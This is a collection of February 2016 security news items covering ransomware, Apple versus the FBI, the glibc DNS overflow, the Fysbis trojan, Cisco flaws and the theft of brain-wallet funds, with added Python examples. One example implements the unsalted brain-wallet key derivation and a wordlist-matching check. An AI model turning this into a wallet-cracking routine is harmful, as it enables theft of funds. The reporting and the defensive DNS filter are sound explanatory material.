"The quickest and most efficient way to restore our systems and administrative functions was to pay the ransom and obtain the decryption key," the hospital CEO Allen Stefanek said in a letter.
All the electronic medical systems were restored soon after the files were decrypted.
Ransomware has cost many network administrators sleepless nights, as they are often the ones blamed for fighting this nasty threat, rather than the staff who click illegitimate links in their email.
The FBI Advises Victims to Just Pay the Ransom
Last year even the FBI advised victims to pay the ransom, as it had no other alternative to offer.
Several organizations have been caught in the ransomware net, including a US police department that paid US$750 to ransomware criminals three years ago.
Criminals demand the ransom in Bitcoin (a smart move on their part) to reduce the chance of getting caught: there is no central authority to freeze the funds, and wallet addresses are pseudonymous, although the public ledger means payments can still be traced.
So, until a permanent solution evolves, users should not click suspicious or unexpected links sent by unknown senders.
Every ransom paid encourages the hackers in the dark to stash the cash and develop a more enticing framework for the next target.
But hitting a medical system is a heinous crime, since hospitals are the bridge between life and death.
Apple vs. FBI — Google Joins Tim Cook in Encryption Backdoor Battle
18.2.2016 Apple
In the escalating battle between the Federal Bureau of Investigation (FBI) and Apple over iPhone encryption, former National Security Agency (NSA) contractor Edward Snowden and Google chief executive Sundar Pichai have sided with Apple's refusal to unlock an iPhone.
Yesterday, Apple CEO Tim Cook refused to comply with a federal court order to help the FBI unlock an iPhone used by one of the attackers in the mass shooting in San Bernardino, California, in December.
Here's What the FBI is Demanding:
Federal officials have asked Apple to build a weakened version of iOS that would let them brute-force the 4- to 6-digit passcode on the dead shooter's iPhone without triggering the device's auto-erase.
Cook called the court order a "chilling" demand that "would undermine the very freedoms and liberty our government is meant to protect." He argued that helping the FBI unlock the iPhone would amount to building an encryption backdoor that would make Apple's products less secure.
Backdoor for Government, Backdoor for All
Apple worries that once such a backdoor is created and handed to the FBI, it could end up in the hands of malicious hackers who would use it for their own purposes.
Although many politicians, including Donald Trump, have slammed Apple's decision, Google has stepped up and taken a public stand in support of it.
"I agree 100 percent with the courts," Trump said in a statement. "But to think that Apple won't allow us to get into her cell phone, who do they think they are? No, we have to open it up."
Google Sided with Apple
In a series of tweets late Wednesday, Pichai sided with Apple while saying "forcing companies to enable hacking could compromise users' privacy" and "requiring companies to enable hacking of customer devices & data. Could be a troubling precedent."
However, Pichai took more than 12 hours to weigh in on this burning issue, after Edward Snowden pointed out that Google had not yet stepped forward to take a stand.
"The @FBI is creating a world where citizens rely on #Apple to defend their rights, rather than the other way around," Snowden tweeted on Wednesday. Snowden called on Google to stand with Apple, saying, "This is the most important tech case in a decade."
Pichai's stance is basically:
The technology companies will give their customers' data to law enforcement when required to, but they will not put in a "Backdoor" for the government.
While the statements made by Pichai are not quite as forceful as Cook's statement published in an open letter to Apple's customers, we can assume Google and Apple are aligned, at least in the sense that the federal agencies are asking too much.
Anonymous leaked 18GB of data belonging to the Turkish national police
18.2.2016 Hacking
Members of the Anonymous group have stolen 18GB worth of data belonging to Turkey’s national police force and leaked it online.
The hacktivist group Anonymous has just released roughly 18GB of sensitive data belonging to Turkey's national police.
The hackers have accessed the database of the Turkish General Directorate of Security (EGM) and leaked the archive on file sharing websites.
Anonymous targeted the Turkish authorities to protest against widespread corruption within the Turkish government.
“Hey Turkey, I have something to show you tomorrow. See, if you fight your citizens, they will bite back. #standby.” states a tweet posted on Sunday by the account @CthulhuSec
The same account shared a link to the archive a day after the first tweet; "Enjoy responsibly" stated the message.
The link shared points to a page including the links to the archive and the following message:
“I have been asked to release the following files by ROR[RG], who is responsible for collecting them.
The material was taken from the EGM which is the Turkey National Police.
The source has had persistent access to various parts of the Turkish Government infrastructure for the past 2 years and
in light of various government abuses in the past few months, has decided to take action against corruption by releasing this.” reports the page.
Accessing the 17.8 GB of data requires "some knowledge of databases":
“As with everything I share, I do not make any claims for the data. However, please note you may require some knowledge
of databases to be able to properly extrapolate information from this data set. If anyone can make a more accessible
version for the less technically inclined, ping it over to me and I will add it here.”
Anonymous has already targeted the Turkish Government: in December 2015 it launched a number of cyberattacks on Turkey's internet, forcing the nation to shut down thousands of websites.
The Turkish authorities haven't commented on the incident.
Researcher hacks medical devices and the whole hospital with ease
18.2.2016 Hacking
Sergey Lozhkin, a security expert at Kaspersky Lab, demonstrated how easy it is for hackers to compromise medical devices and critical healthcare infrastructure.
The rise of the Internet of Things (IoT) has left devices more connected, yet in many cases more vulnerable, than ever before. From car hacking to cyber attacks against the energy sector, it has never been more essential for manufacturers and IT teams to adopt a 'security-first' attitude.
Yet despite a steep rise in successful hacks, security is regularly neglected. In a recent study presented at the recently held Security Analyst Summit in Spain, Sergey Lozhkin, a senior security researcher at Kaspersky Lab, turned his attention to hospitals to show how simple it really is for an online attacker to compromise critical medical infrastructure.
“If something goes wrong with medical equipment, if someone hacked a device that helps a doctor to identify an illness, if someone could affect this data a healthy person could be treated as an ill person or the opposite,” he said, adding: “If someone affects the results of for example, MRI, it could be really rough.”
In his talk, Lozhkin laid out how easily he could break into the hospital's network, with its consent, after discovering vulnerable medical devices listed on Shodan.
“I decided that this is a critical area and I wanted to research it. I decided to look on the internet, I found the hospital, tested the WiFi network and finally I was able to connect to an MRI device and find personal information and [flaws] in the architecture. It was scary because it was really easy” He explained. “The initial vector was the WiFi network, the network was not really as secure as it should be in such a place where you keep medical data.”
Shodan is a search engine that scans for open ports on the internet and is frequently used by security researchers to find critical infrastructure that ought to be better protected. The 'search engine' nature of Shodan regularly courts controversy for linking to exposed devices such as webcams and, most recently, baby monitors.
“[Shodan] can get some answers concerning the equipment and programming associated [to the internet] and in the event that you know, for instance, what input a MRI or laser or cardiology gadget gives when you interface with its port, you can go to Shodan and discover about several of these gadgets and on the off chance that you know a weakness you can hack every one of them,” the Kaspersky researcher warned.
“For this situation it was simple. Therapeutic gadgets are still shaky, I can see it. A few makers truly secure them however some [developers] are pondering web security in second or third place.”
Looking at the future of IoT, Lozhkin added: “I think lots of people from both sides, the white-hat security researchers and the bad guys, are deeply researching this area – car hacking, connected cars, medical devices, everything. For cyber criminals it could be a big market.”
Most recently, an internal emergency was declared at a major US hospital in Los Angeles following a widespread ransomware-style cyberattack that left staff unable to access essential patient data.
Instagram Adds Two-Step Verification to Prevent Account from being Hacked
17.2.2016 Hacking
Hijacking an online account is not a complicated procedure, at least not in 2016.
Today, Instagram confirmed that the company is in the process of rolling out two-factor authentication for its 400 Million users.
It is impossible to make your online accounts hack-proof, but you can make them less vulnerable.
So what can you do to protect yourself from hackers?
Several companies provide more enhanced steps like Encrypted Channel Services, Security Questions, Strict Password Policy and so on.
But, what would you do if a hacker had somehow managed to access your accounts’ passwords?
Online accounts have no built-in way to verify that the person logging in is the legitimate owner of the account beyond a username and password match.
Hence the concept of Two-Factor Authentication (2FA) was born!
Giants like Google, Facebook, Twitter and Amazon have already added the 2FA feature to their services to tackle account hijacking.
2-Factor Authentication, or two-step verification, is an additional security mechanism that confirms the user is legitimate only after a second identification step, i.e. a randomly generated security code is provided to the user via call/SMS for authentication.
2-Factor Authentication prevents hackers from intruding into your online accounts (even if they have your usernames and passwords).
Now, the Multimedia sharing Giant Instagram also joined the league by implementing two-step verification.
Better late than Never:
However, the decision to roll out the 2FA feature could be criticized, as its parent company Facebook had already implemented it five years back.
Current users should not expect the new two-step verification feature to be released soon, as the company has said it will roll out the phone verification feature slowly.
There is good news for Singapore residents, though: the first rollout will be for Singaporeans.
Instagram account hacking is nothing new; many videos and images of celebrities have leaked online in past years.
Hackers could create havoc such as hijacking or deleting Instagram accounts, flooding an account with illegitimate content and much more. Taylor Swift was one such victim of an Instagram hack.
To protect yourself from hackers, you are recommended to enable 2-Factor Authentication as soon as the Instagram security feature rolls out for your country.
GCHQ helped US in developing Stuxnet, claims a documentary
17.2.2016 BigBrothers
A new documentary titled Zero Days revealed that the Stuxnet cyber weapon was just a small part of a much bigger Information Warfare operation (code named “NITRO ZEUS”) against the Iranian civilian infrastructure.
A new documentary titled Zero Days has revealed more disconcerting news about the Stuxnet worm, the first malware recognized by the security industry as a cyber weapon. The documentary sheds light on the US cyber warfare program that included the design of Stuxnet, and it also reveals that hundreds of thousands of network implants and backdoors in Iranian networks were managed by Western entities to penetrate Iranian infrastructure and destroy it.
Zero Days presented at the Berlin Film Festival confirms that Stuxnet was developed under the Information warfare operation called “Olympic Games,” which is part of a wider programme dubbed “Nitro Zeus” that involves hundreds of US cyber security experts. The US was not alone, the Israeli Government has a primary role in the Nitro Zeus program.
The documentary confirms that the nation-state hackers behind Stuxnet went to considerable effort to keep their operation covert; they also designed the threat to operate only against Iranian machines.
One of the most intriguing claims in the documentary is the involvement of GCHQ: the film claims that British intelligence provided information for the development of the four zero-day exploits specifically designed to hit the control systems at the Natanz facility.
NSA experts worked hard to cover their tracks after the infection became public, but the author of the report confirmed the existence of a more aggressive version of Stuxnet, developed by the Israeli side, that went out of control and infected thousands of computers across more than 115 countries.
It is not clear whether GCHQ was informed about the Nitro Zeus program.
NSA’s Top-Secret SKYNET May Be Killing Thousands of Innocent Civilians
17.2.2016 BigBrothers
NSA’s Top-Secret SKYNET May Be Killing Thousands of Innocent Civilians With Drones
So what do you expect from an Artificially intelligent program run by the government intelligence agency?
Possibly killing innocent people.
The real-life SKYNET, named after the fictional malevolent artificial intelligence in the Terminator movies, is a surveillance program run by the US National Security Agency (NSA) that uses cell phone metadata to track the GPS location and call activity of suspected terrorists, who may then be targeted by a Hellfire missile.
Now, a new analysis of previously published NSA documents leaked by former NSA staffer Edward Snowden suggests that many of those people killed based on metadata may have been innocent.
Last year, the leaked documents detailing the NSA's SKYNET programme published by The Intercept showed that NSA had used a machine learning algorithm on the cellular network metadata of 55 Million people in Pakistan to rate each citizen's likelihood of being a terrorist.
You need to know that the US drone bombing campaigns in Pakistan have been raging for years.
Elementary Errors in SKYNET
However, the spy agency made elementary errors in its machine-learning approach, which led to the generation of thousands of false leads, potentially exposing innocent people to remote assassination by drone.
One of the leaked slides claimed that SKYNET has a false-positive rate of 0.008%, in some cases, and the NSA was using about 55 million people’s phone records for SKYNET.
But, Ars Technica points out that, even at this minute rate, many innocent people are possibly mislabeled. Some of the NSA's tests even saw higher error rates of 0.18%, which means mislabeling nearly 99,000 people out of the 55 Million.
"There are very few 'known terrorists' to use to train and test the model," Patrick Ball, the executive director of Human Rights Data Analysis Group, told the site. "If they are using the same records to train the model as they are using to test the model, their assessment of the fit is completely bullshit."
The purpose SKYNET serves is not clear yet. Although SKYNET could be part of non-violent surveillance programs, like tracking and monitoring suspected terrorists, Ars suggests this technology could potentially be used to target drone strikes.
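The article quotes false-positive rates and a population but never the number of genuine targets, which is what decides how many of the flagged people are innocent. This added example (mine, not from the leaked slides or Ars Technica) carries the base-rate arithmetic through with the article's figures; the counts of real targets are assumptions.

```python
# Population and error rates quoted in the article.
POPULATION = 55_000_000
FPR_BEST_PERCENT = 0.008   # the slide's best-case false-positive rate
FPR_TEST_PERCENT = 0.18    # the higher rate seen in some NSA tests


def expected_false_positives(population: int, fpr_percent: float) -> int:
    """People wrongly flagged when a classifier with the given false-positive
    rate (in percent) is run over everyone in the population."""
    return round(population * fpr_percent / 100)


def precision(population: int, fpr_percent: float, true_positives: int,
              recall: float = 1.0) -> float:
    """Share of flagged people who really are positives. `true_positives` is
    an assumed number of genuine targets (the article gives none) and
    `recall` is the fraction of them the model catches."""
    caught = true_positives * recall
    wrongly_flagged = population * fpr_percent / 100
    return caught / (caught + wrongly_flagged)


def summary(population: int, fpr_percent: float, assumed_positives: int) -> dict:
    """Collect the three numbers a reviewer of such a model would ask for."""
    fp = expected_false_positives(population, fpr_percent)
    return {
        "false_positives": fp,
        "precision": precision(population, fpr_percent, assumed_positives),
        "innocent_per_true_hit": fp / assumed_positives,
    }


if __name__ == "__main__":
    for fpr in (FPR_BEST_PERCENT, FPR_TEST_PERCENT):
        for positives in (100, 1000):   # assumed counts, not from the article
            s = summary(POPULATION, fpr, positives)
            print(f"FPR {fpr}% with {positives} real targets: "
                  f"{s['false_positives']:,} false positives, "
                  f"precision {s['precision']:.1%}, "
                  f"{s['innocent_per_true_hit']:.0f} innocents per real hit")
```

Even at the best-case 0.008% rate the model flags 4,400 people, so with a hundred real targets fewer than one flagged person in forty is one of them.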
US Drone Strike Killed Almost 4,000 People
Since 2004, the United States government has carried out hundreds of drone strikes against alleged terrorists in Pakistan and killed somewhere between 2,500 and 4,000 people, the Bureau of Investigative Journalism reported.
The NSA has not yet commented on how the agency used SKYNET, and how the technology was trained.
But Does Killing people "Based on Metadata" actually make sense?
Maybe it is easy to say YES, it makes sense as it happened or is happening far away in a foreign land. But imagine if SKYNET gets turned on us.
Linux Fysbis Trojan, a new weapon in the Pawn Storm’s arsenal
17.2.2016 Virus
Malware researchers at PaloAlto discovered the Fysbis Trojan, a simple and an effective Linux threat used by the Russian cyberspy group Pawn Storm.
Do you remember the Pawn Storm hacking crew? Security experts have identified this group of Russian hackers under several names, including APT28, Sofacy and Sednit; it has been active since at least 2007.
The name Pawn Storm is used by security experts to reference an active economic and political cyber-espionage operation targeting a wide range of entities, most of them belonging to the military, governments, and media industries.
Specific targets include:
Military agencies, embassies, and defense contractors in the US and its allies
Opposition politicians and dissidents of the Russian government
International media
The national security department of a US ally
The Pawn Storm APT group is considered a highly sophisticated threat with zero-day exploits in its arsenal. The group has used several strains of malware for the different operating systems on the market, including mobile spyware designed to infect Apple iOS devices. One of the principal tools used by the Russian hackers is a Windows backdoor called Sednit.
Now the group is back again, targeting Linux systems with a Trojan dubbed Fysbis that is able to compromise targets without requiring highly privileged access. According to the malware researchers at Palo Alto Networks, the Fysbis Trojan is a preferred tool for infecting Linux systems even though it isn't a sophisticated threat.
“The Linux malware Fysbis is a preferred tool of Sofacy, and though it is not particularly sophisticated, Linux security in general is still a maturing area, especially in regards to malware. In short, it is entirely plausible that this tool has contributed to the success of associated attacks by this group. This blog post focuses specifically on this Linux tool preferred by Sofacy and describes considerations and implications when it comes to Linux malware.” the PaloAlto researchers said Friday in a blog post.
The Fysbis Trojan implements a modular structure: the core components are a set of plugins that can be loaded to add new functionality to the agent.
“Fysbis is a modular Linux trojan / backdoor that implements plug-in and controller modules as distinct classes. For reference, some vendors categorize this malware under the Sednit attacker group naming designation. This malware includes both 32-bit and 64-bit versions of Executable and Linking Format (ELF) binaries. Additionally, Fysbis can install itself to a victim system with or without root privileges.” continues the analysis published by Palo Alto Networks.
The Fysbis Trojan was designed to exfiltrate potentially sensitive documents and spy on the user’s Web browsing and other activities.
The experts at Palo Alto Networks' Unit 42 have observed that APT groups tend to reuse historical command and control infrastructure. The analysis of the Fysbis Trojan samples confirmed this behavior; however, in the latest variants the threat actor also used previously unknown servers.
The choice to develop a Linux trojan doesn't surprise the experts: Linux is the preferred platform in data centers, in cloud infrastructure for businesses, and on application servers. Linux is also the core of Android devices and many other embedded systems. There is another aspect to consider: many business environments mainly use Windows systems, which means they are more effective at detecting Windows threats thanks to the adoption of specific defense solutions.
Critical glibc Flaw Puts Linux Machines and Apps at Risk (Patch Immediately)
17.2.2016 Vulnerebility
A highly critical vulnerability has been uncovered in the GNU C Library (glibc), a key component of most Linux distributions, that leaves nearly all Linux machines, thousands of apps and electronic devices vulnerable to hackers that can take full control over them.
Just clicking on a link or connecting to a server can result in remote code execution (RCE), allowing hackers to steal credentials, spy on users, seize control of computers, and many more.
The vulnerability is similar to last year's GHOST vulnerability (CVE-2015-0235) that left countless machines vulnerable to remote code execution (RCE) attacks, representing a major Internet threat.
GNU C Library (glibc) is a collection of open source code that powers thousands of standalone apps and most Linux distributions, including those distributed to routers and other types of hardware.
The recent flaw, which is indexed as CVE-2015-7547, is a stack-based buffer overflow vulnerability in glibc's DNS client-side resolver that is used to translate human-readable domain names, like google.com, into a network IP address.
The buffer overflow flaw is triggered when the getaddrinfo() library function that performs domain-name lookups is in use, allowing hackers to remotely execute malicious code.
How Does the Flaw Work?
The flaw can be exploited when an affected device or app makes queries to a malicious DNS server that returns an oversized reply to a lookup request and floods the program's memory with attacker-supplied code.
This code then compromises the vulnerable application or device and tries to take over the control over the whole system.
It is possible to inject the domain name into server log files, which when resolved will trigger remote code execution. An SSH (Secure Shell) client connecting to a server could also be compromised.
However, an attacker needs to bypass several operating system security mechanisms – like ASLR and non-executable stack protection – in order to achieve a successful RCE attack.
Alternatively, an attacker on your network could perform man-in-the-middle (MitM) attacks and tamper with DNS replies with a view to monitoring and manipulating (injecting payloads of malicious code into) data flowing between a vulnerable device and the Internet.
Affected Software and Devices
All versions of glibc after 2.9 are vulnerable. Therefore, any software or application that connects to things on a network or the Internet and uses glibc is at RISK.
The widely used SSH, sudo, and curl utilities are all known to be affected by the buffer overflow bug, and security researchers warn that the list of other affected applications or code is almost too diverse and numerous to enumerate completely.
The vulnerability could extend to a nearly all the major software, including:
Virtually all distributions of Linux.
Programming languages such as Python, PHP, and Ruby on Rails.
Many others that use Linux code to look up the numerical IP address of an Internet domain.
Most Bitcoin software is reportedly vulnerable, too.
Who are Not Affected
The good news is that users of Google's Android mobile operating system aren't vulnerable to this flaw, as the company uses a glibc substitute known as Bionic that is not susceptible, according to a Google representative.
Additionally, a lot of embedded Linux devices, including home routers and various gadgets, are not affected by the bug because these devices use the uClibc library, which is more lightweight than the hefty glibc.
The vulnerability was first introduced in May 2008 but was reported to the glibc maintainers in July 2015.
The vulnerability was discovered independently by researchers at Google and Red Hat, who found that it has likely not been publicly attacked.
The flaw was discovered when one of Google's SSH apps experienced a severe error called a segmentation fault each time it attempted to contact a particular Internet address, Google's security team reported in a blog post published Monday.
Where glibc went Wrong
Google researchers figured out that the error was due to a buffer overflow bug inside the glibc library that made malicious code execution attacks possible. The researchers then notified glibc maintainers.
Here's what went wrong, according to the Google engineers:
"glibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query. Later on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated."
"Under certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow."
Proof-of-Concept Exploit Released
Google bod Fermin J. Serna released a Proof-of-Concept (POC) exploit code on Tuesday.
With this POC code, you can verify if you are affected by this critical issue, and verify any mitigations you may wish to enact.
Patch glibc Vulnerability
Google researchers, working with security researchers at Red Hat, have released a patch to fix the programming blunder.
However, it is now up to the community behind the Linux OS and manufacturers, to roll out the patch to their affected software and devices as soon as possible.
For people running servers, fixing the issue will be a simple process of downloading and installing the patch update.
But for other users, patching the problem may not be so easy. The apps compiled with a vulnerable glibc version should be recompiled with an updated version – a process that will take time as users of affected apps have to wait for updates to become available from developers.
Meanwhile, you can help prevent exploitation of the flaw, if you aren’t able to immediately patch your instance of glibc, by limiting all TCP DNS replies to 1024 bytes, and dropping UDP DNS packets larger than 512 bytes.
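The stopgap above is a size limit on DNS replies, so the check worth having is one that parses only the DNS header (to tell a response from a query) and drops responses over the quoted limits. This is an added example of mine, not Google's or Red Hat's tooling; the replies are constructed inline.

```python
import socket
import struct

# Interim mitigation sizes from the article, measured on the DNS message
# itself (not counting IP/UDP headers or the 2-byte TCP length prefix).
UDP_MAX_REPLY = 512
TCP_MAX_REPLY = 1024


def parse_dns_header(msg: bytes) -> dict:
    """Decode the fixed 12-byte DNS header (RFC 1035 layout)."""
    if len(msg) < 12:
        raise ValueError("shorter than a DNS header")
    ident, flags, qdcount, ancount, nscount, arcount = struct.unpack("!6H", msg[:12])
    return {
        "id": ident,
        "is_response": bool(flags & 0x8000),   # QR bit
        "truncated": bool(flags & 0x0200),     # TC bit
        "qdcount": qdcount,
        "ancount": ancount,
        "nscount": nscount,
        "arcount": arcount,
    }


def reply_allowed(transport: str, msg: bytes) -> bool:
    """Return False when a DNS *response* exceeds the interim size limit for
    its transport. Queries and payloads too short to be DNS are left alone."""
    try:
        header = parse_dns_header(msg)
    except ValueError:
        return True
    if not header["is_response"]:
        return True
    limit = UDP_MAX_REPLY if transport.lower() == "udp" else TCP_MAX_REPLY
    return len(msg) <= limit


def encode_name(name: str) -> bytes:
    """Wire-encode a domain name as length-prefixed labels."""
    return b"".join(bytes([len(label)]) + label.encode("ascii")
                    for label in name.rstrip(".").split(".")) + b"\x00"


def build_response(qname: str, addrs: list, ident: int = 0x1234) -> bytes:
    """Construct a well-formed A-record response for offline testing. Each
    answer uses a compression pointer (0xC00C) back to the question name,
    so every record costs exactly 16 bytes."""
    flags = 0x8180  # QR=1, RD=1, RA=1, RCODE=0
    header = struct.pack("!6H", ident, flags, 1, len(addrs), 0, 0)
    question = encode_name(qname) + struct.pack("!HH", 1, 1)  # type A, class IN
    answers = b"".join(
        b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 300, 4) + socket.inet_aton(a)
        for a in addrs
    )
    return header + question + answers


if __name__ == "__main__":
    # Constructed replies: 1, 40 and 70 A records for example.com.
    for n in (1, 40, 70):
        reply = build_response("example.com", [f"192.0.2.{i}" for i in range(1, n + 1)])
        print(f"{n:>2} A records, {len(reply):>4} bytes: "
              f"udp={'pass' if reply_allowed('udp', reply) else 'DROP'} "
              f"tcp={'pass' if reply_allowed('tcp', reply) else 'DROP'}")
```

The 40-record reply is perfectly legitimate yet gets dropped over UDP, which is why the article presents the size limit as a stopgap until the resolver itself is patched.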
For more in-depth information on the glibc flaw, you can read Red Hat blog post.
Cisco Industrial switches affected by an unpatched flaw
17.2.2016 Vulnerebility
Cisco disclosed a DoS vulnerability affecting the IOS software running on the industrial switches belonging to the Industrial Ethernet 2000 Series.
Last week I wrote about a vulnerability affecting Cisco Universal Small Cell kits that allows unauthenticated remote users to retrieve devices' firmware; now another vulnerability is worrying the customers of the IT giant. The flaw, tracked as CVE-2016-1330, affects Cisco Industrial Ethernet 2000 Series Switches running IOS Software 15.2(4)E.
The flaw affects the way the devices process Cisco Discovery Protocol (CDP) packets: an unauthenticated attacker with access to the network can send specially crafted CDP packets to the Cisco Industrial Switches to cause vulnerable devices to reload.
“A vulnerability in the processing of Cisco Discovery Protocol (CDP) packets by Cisco IOS Software for Cisco Industrial Ethernet 2000 Series Switches could allow an unauthenticated, adjacent attacker to cause an affected device to reload.” states the Cisco Security Advisory. “The vulnerability is due to improper processing of crafted CDP packets. An attacker could exploit this vulnerability by sending a crafted CDP packet to an affected device. An exploit could allow the attacker to cause the affected device to reload.”
Cisco has yet to release a patch to solve the issue and there are no workarounds, fortunately, the vulnerability hasn’t been exploited in the wild.
Cisco also disclosed a second vulnerability, tracked as CVE-2016-1331, in Cisco Emergency Responder, a family of devices designed to allow emergency teams to identify the location of 911 callers. The vulnerability is a cross-site scripting (XSS) flaw rated as medium severity that allows an unauthenticated attacker to execute arbitrary code in the context of the vulnerable web interface and access potentially sensitive browser information.
“A vulnerability in the web framework code of Cisco Emergency Responder could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against the user of the web interface of an affected system.” states the Cisco Advisory.
“The vulnerability is due to insufficient input validation of some parameters passed to the web server. An attacker could exploit this vulnerability by convincing the user to access a malicious link or by intercepting the user request and injecting malicious code. An exploit could allow the attacker to execute arbitrary code in the context of the affected site or allow the attacker to access sensitive browser-based information.”
In a possible attack scenario, the attacker can trigger the vulnerability by tricking the victim into clicking on a malicious link or by injecting malicious code into an intercepted connection.
In this case too, there is neither a patch nor a workaround available.
$103,000 stolen in Brain Wallets cracking attacks
17.2.2016 Computer Attack
A group of researchers discovered that roughly 1,000 brain wallets have been drained by cyber criminals who have stolen $103,000.
The term brainwallet refers to the concept of storing Bitcoins in one’s own mind by memorization of a passphrase. The phrase is converted into a 256-bit private key with a hashing or key derivation algorithm (example: SHA256). That private key is used to calculate the final Bitcoin address.
This method was erroneously considered secure because malware-based attacks are ineffective at stealing private keys, but an expert has now demonstrated that brain wallets are not secure because the passphrases can easily be cracked by an attacker. The researcher explained that brain wallets used no salt and passed plaintext passphrases through a single hash iteration, which makes it easy for attackers to crack them. Another problem is that a form of the insecurely hashed passphrase is stored in the Bitcoin blockchain, giving attackers more information to work with.
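The weakness described above is the derivation itself: one unsalted SHA-256 and the digest is the key. This added example (mine, not from the paper or any wallet software) implements that scheme next to an assumed salted, iterated KDF, plus an owner-side self-check against a wordlist, so the per-guess cost gap is visible; the passphrase, salt and wordlist are constructed.

```python
import hashlib
import hmac
import time
from typing import Callable, Iterable, Optional

# Constructed sample values for the demonstration; not from any real wallet.
SAMPLE_PASSPHRASE = "abc"
SAMPLE_SALT = b"per-user-random-salt"


def brainwallet_key(passphrase: str) -> bytes:
    """The scheme the article describes: one unsalted SHA-256 of the
    passphrase, with the 32-byte digest used directly as the private key.
    Every guess costs exactly one hash, and the same passphrase yields the
    same key for every user, so one wordlist pass covers all wallets."""
    return hashlib.sha256(passphrase.encode("utf-8")).digest()


def hardened_key(passphrase: str, salt: bytes, iterations: int = 200_000) -> bytes:
    """Contrast case (an assumed hardening, not any product's scheme): a
    random per-user salt plus an iterated KDF. A guess now has to be
    recomputed per salt and costs `iterations` HMAC-SHA256 calls."""
    return hashlib.pbkdf2_hmac(
        "sha256", passphrase.encode("utf-8"), salt, iterations, dklen=32
    )


def wordlist_exposure(candidates: Iterable[str], own_key: bytes) -> Optional[str]:
    """Owner-side self-check: does any passphrase in a wordlist reproduce
    my brain-wallet key? Returns the matching passphrase or None.
    compare_digest keeps the comparison constant-time."""
    for candidate in candidates:
        if hmac.compare_digest(brainwallet_key(candidate), own_key):
            return candidate
    return None


def derivations_per_second(derive: Callable[[], bytes], seconds: float = 0.25) -> float:
    """Measure how many derivations per second this machine manages, to
    show the cost gap between the two schemes (timing only)."""
    count = 0
    deadline = time.perf_counter() + seconds
    while time.perf_counter() < deadline:
        derive()
        count += 1
    return count / seconds


if __name__ == "__main__":
    key = brainwallet_key(SAMPLE_PASSPHRASE)
    print("brain-wallet key:", key.hex())
    # A three-entry constructed wordlist already contains the sample passphrase.
    print("found in wordlist:", wordlist_exposure(["password", "abc", "letmein"], key))
    fast = derivations_per_second(lambda: brainwallet_key(SAMPLE_PASSPHRASE))
    slow = derivations_per_second(lambda: hardened_key(SAMPLE_PASSPHRASE, SAMPLE_SALT, 20_000))
    print(f"unsalted SHA-256: ~{fast:,.0f} guesses/s; PBKDF2 (20k iters): ~{slow:,.0f} guesses/s")
```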
The researcher Ryan Castellucci demonstrated at the DEF CON conference last year how to crack brain wallets:
“Our implementation improves the state of the art by a factor of 2.5, with focus on the cases where side channel attacks are not a concern and a large quantity of RAM is available. As a result, we are able to scan the Bitcoin blockchain for weak keys faster than any previous implementation.” states the paper.
Now researchers at the University of Tulsa, Stanford University and Southern Methodist University have devised a new method to crack brain wallet passphrases faster than the method developed by Castellucci.
The researchers published a paper demonstrating the efficiency of their Bitcoin key recovery attacks, which are 2.5 times faster than Castellucci's technique.
The researchers evaluated roughly 300 billion passwords and discovered that fewer than 1,000 brain wallets were used between September 2011 and August 2015.
“In this paper, we report on the first large-scale measurement of the use of brain wallets in Bitcoin. Using a wide range of word lists, we evaluated around 300 billion passwords. Surprisingly, after excluding activities by researchers, we identified just 884 brain wallets worth around $100K in use from September 2011 to August 2015.” researchers wrote in their paper.
“Our results reveal the existence of an active attacker community that rapidly steals funds from vulnerable brain wallets in nearly all cases we identify,” explained the researchers. “In total, approximately $100K worth of bitcoin has been loaded into brain wallets, with the ten most valuable wallets accounting for over three-quarters of the total value. Many brain wallets are drained within minutes, and while those storing larger values are emptied faster, nearly all wallets are drained within 24 hours.”
The passwords were derived from words available in dictionaries, the passwords were then compared to a list of all used Bitcoin addresses to determine which of them were associated with brain wallets.
Experts identified 884 brain wallets storing 1,806 BTC (worth approximately $100,000) and discovered that only 21 of them were not drained by cyber criminals.
It was disconcerting that in many cases, the accounts were drained within minutes or seconds, the researchers also noticed that there is no evidence that Bitcoin wallets containing larger amounts of money were protected by the owners with stronger passwords.
“We find that all but 21 wallets were drained, usually within 24 hours but often within minutes. We find that around a dozen “drainers” are competing to liquidate brain wallets as soon as they are funded.” continue the researchers.
The experts analyzed the Bitcoin transactions involving brain wallets and discovered that at least 14 entities were involved in the attacks.
“A few drainers are very successful while the rest do not make very much,” researchers wrote in their paper. “The top 4 drainers have netted the equivalent of $35,000 between them. The drainer who has emptied the most brain wallets — 100 in all — has earned $3,219 for the effort. But other drainers have stolen very little money. For example, one drainer stole from 78 different brain wallets but netted only $62 worth of bitcoin.”
The group of researchers will present the study, titled “The Bitcoin Brain Drain: A Short Paper on the Use and Abuse of Bitcoin Brain Wallets,” at the next Financial Cryptography and Data Security 2016 conference.
US Judge requests Apple to unlock San Bernardino shooter’s iPhone
17.2.2016 Apple
A US magistrate ordered Apple to help unlock the San Bernardino shooter's iPhone; note that it is demanding a tool to bypass the security mechanism.
We have often discussed the difficulties law enforcement faces in conducting investigations when suspects use devices that rely on encryption; the case we are going to analyze is emblematic.
Apple must assist the FBI in unlocking the passcode-protected encrypted iPhone belonging to Syed Farook, one of the San Bernardino shooters in California.
The smartphone belonged to Syed Farook, who with his wife Tashfeen Malik killed 14 coworkers on December 2, 2015. Police intervened but failed to capture them alive because they died in a shootout with agents.
The agents seized the Syed’s smartphone, an iPhone 5C, but they were not able to access it because it is protected by a password. The authorities requested support to Apple with a court order issued by the US magistrate Sheri Pym.
After 10 wrong guesses, the iOS locks up requiring a sync with iTunes to restore, or automatically wipes the handset’s data, depending on the user settings.
The magistrate Sheri Pym is requesting Apple to find a way to supply software that prevents the phone from automatically wipe data when too many attempts fail. In this way, the police is free to run a brute-force attack to guess the PIN and overwhelm the security feature.
Apple have to unlock San Bernardino shooter's iPhone
Note that the magistrate has not asked Apple to crack its encryption; the order demands a tool that bypasses the security mechanism.
As reported by The Register:
“It’s technically possible for Apple to hack a device’s PIN, wipe, and other functions. Question is can they be legally forced to hack,” tweeted forensic scientist Jonathan Zdziarski.
